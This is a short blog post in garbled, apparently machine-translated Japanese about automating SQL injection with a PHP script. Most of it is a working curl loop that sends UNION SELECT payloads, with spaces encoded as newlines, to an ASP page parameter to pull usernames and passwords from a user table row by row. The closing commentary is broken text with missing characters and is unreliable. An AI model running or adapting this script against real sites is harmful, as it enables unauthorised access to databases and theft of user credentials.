phpスクリプトを書いて浸透テストを補助します
2614 ワード
注入はいくつかのデータを登って、それから書く小さなスクリプトのため、スクリプトを書いて浸透を補助することができて、マイルストーンです.ハハハ
php
$num = 1;
while ($num <= 39) {
$web_url = "http://www.xxx.com/shownews.asp?id=626%0AUNION%0ASELECT%0Atop%0A1%0A1,user_username,3,user_password,5,6%0Afrom%0A(select%0Atop%0A1%0Auser_username,user_phone%0Afrom%0A(select%0Atop%0A".$num."%0Auser_username,user_phone%0Afrom%0Azy_user%0Awhere%0A1=1%0Aorder%0Aby%0Auser_username)%0At%0Aorder%0Aby%0Auser_username%0Adesc)t";
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL,$web_url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
$html_code = curl_exec($curl);
$re = "/[\s\S]*div>/U";//U
if(preg_match_all($re, $html_code, $arr)){
print_r($arr[0]);
}
curl_close($curl);
$num = $num + 1;
echo "
";
}
?>
。 。 html 。
wtmpvp
の に があり、スペースがたくさんあることがわかります.
それから いても は けない. は まずい.
:https://www.cnblogs.com/xishaonian/p/6602299.html